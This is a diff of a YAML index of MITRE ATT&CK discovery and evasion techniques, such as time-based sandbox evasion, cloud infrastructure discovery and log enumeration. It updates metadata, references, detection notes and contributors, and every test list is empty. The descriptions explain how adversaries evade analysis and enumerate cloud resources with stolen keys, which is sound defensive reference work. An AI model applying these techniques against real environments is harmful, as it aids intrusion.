-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
       type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
+      id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+      created: '2020-02-21T21:08:33.237Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1087/003
+        external_id: T1087.003
+      - source_name: Black Hills Attacking Exchange MailSniper, 2016
+        description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+          Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+      - source_name: Google Workspace Global Access List
+        description: Google. (n.d.). Retrieved March 16, 2021.
+        url: https://support.google.com/a/answer/166870?hl=en
+      - source_name: Microsoft Exchange Address Lists
+        description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+          Retrieved March 26, 2020.
+        url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+      - source_name: Microsoft getglobaladdresslist
+        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+          2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1497.003:
+    technique:
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -50075,6 +50723,12 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -50084,9 +50738,14 @@ discovery:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -50096,102 +50755,137 @@ discovery:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1580:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Cloud Infrastructure Discovery
+      description: |-
+        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Regina Elwell
       - Praetorian
       - Isif Ibrahima, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+        components. Monitor logs for actions that could be taken to gather information
+        about cloud infrastructure, including the use of discovery API calls by new
+        or unexpected users and enumerations from unknown or malicious IP addresses.
+        To reduce false positives, valid change management procedures could introduce
+        a known identifier that is logged with the change (e.g., tag or header) if
+        supported by the cloud provider, to help distinguish valid, expected actions
+        from malicious ones.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Instance: Instance Enumeration'
+      - 'Cloud Storage: Cloud Storage Enumeration'
+      - 'Volume: Volume Enumeration'
+      - 'Snapshot: Snapshot Enumeration'
       type: attack-pattern
       id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
       created: '2020-08-20T17:51:25.671Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1580
         url: https://attack.mitre.org/techniques/T1580
+        external_id: T1580
       - source_name: Expel IO Evil in AWS
-        url: https://expel.io/blog/finding-evil-in-aws/
         description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
           Evil in AWS. Retrieved June 25, 2020.
+        url: https://expel.io/blog/finding-evil-in-aws/
       - source_name: AWS Head Bucket
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
         description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
           14, 2022.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
       - source_name: AWS Get Public Access Block
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
       - source_name: AWS Describe DB Instances
-        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
       - source_name: Amazon Describe Instance
-        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
         description: Amazon. (n.d.). describe-instance-information. Retrieved March
           3, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
       - source_name: Amazon Describe Instances API
-        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
         description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
       - source_name: Google Compute Instances
-        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
         description: Google. (n.d.). gcloud compute instances list. Retrieved May
           26, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
       - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       - source_name: Microsoft AZ CLI
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
         description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
       - source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
-        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
         description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
           leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
-        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
-        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Cloud Infrastructure Discovery
-      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
-        components. Monitor logs for actions that could be taken to gather information
-        about cloud infrastructure, including the use of discovery API calls by new
-        or unexpected users and enumerations from unknown or malicious IP addresses.
-        To reduce false positives, valid change management procedures could introduce
-        a known identifier that is logged with the change (e.g., tag or header) if
-        supported by the cloud provider, to help distinguish valid, expected actions
-        from malicious ones.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Instance: Instance Enumeration'
-      - 'Cloud Storage: Cloud Storage Enumeration'
-      - 'Volume: Volume Enumeration'
-      - 'Snapshot: Snapshot Enumeration'
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1580
     atomic_tests: []
   T1217:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-16T14:24:40.625Z'
       name: Browser Bookmark Discovery
       description: |-
         Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
@@ -50245,7 +50939,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1217
     atomic_tests: []
   T1016:
@@ -50275,7 +50968,7 @@ discovery:
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
-        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
@@ -50313,12 +51006,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016
     atomic_tests: []
   T1087:
     technique:
-      modified: '2024-01-12T23:36:56.245Z'
+      modified: '2024-10-15T15:35:28.784Z'
       name: Account Discovery
       description: |-
         Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -50345,14 +51037,13 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -50381,7 +51072,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1482:
     technique:
@@ -50441,7 +51131,7 @@ discovery:
         .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
         [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
         to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T19:18:22.305Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Domain Trust Discovery
       x_mitre_detection: |
@@ -50460,7 +51150,6 @@ discovery:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1482
     atomic_tests: []
   T1083:
@@ -50529,12 +51218,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1083
     atomic_tests: []
   T1049:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-09-06T22:35:34.231Z'
       name: System Network Connections Discovery
       description: "Adversaries may attempt to get a listing of network connections
         to or from the compromised system they are currently accessing or from remote
@@ -50611,40 +51299,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1049
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -50656,6 +51315,10 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -50666,8 +51329,14 @@ discovery:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -50677,9 +51346,28 @@ discovery:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1619:
     technique:
@@ -50712,7 +51400,7 @@ discovery:
         Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
 
         Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-11T22:29:43.677Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Cloud Storage Object Discovery
       x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -50730,12 +51418,11 @@ discovery:
       - 'Cloud Storage: Cloud Storage Enumeration'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1619
     atomic_tests: []
   T1654:
     technique:
-      modified: '2023-09-30T22:18:46.711Z'
+      modified: '2024-10-15T12:24:40.892Z'
       name: Log Enumeration
       description: |-
         Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -50743,11 +51430,14 @@ discovery:
         Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
 
         Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+        In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
       x_mitre_contributors:
       - Bilal Bahadır Yenici
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -50758,7 +51448,7 @@ discovery:
       - macOS
       - Windows
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -50772,6 +51462,10 @@ discovery:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1654
         external_id: T1654
+      - source_name: Permiso GUI-Vil 2023
+        description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+          Cloud Threat Actor. Retrieved August 30, 2024.'
+        url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
       - source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
         description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
           of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -50791,56 +51485,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1654
     atomic_tests: []
   T1087.004:
     technique:
-      x_mitre_platforms:
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
-      type: attack-pattern
-      created: '2020-02-21T21:08:36.570Z'
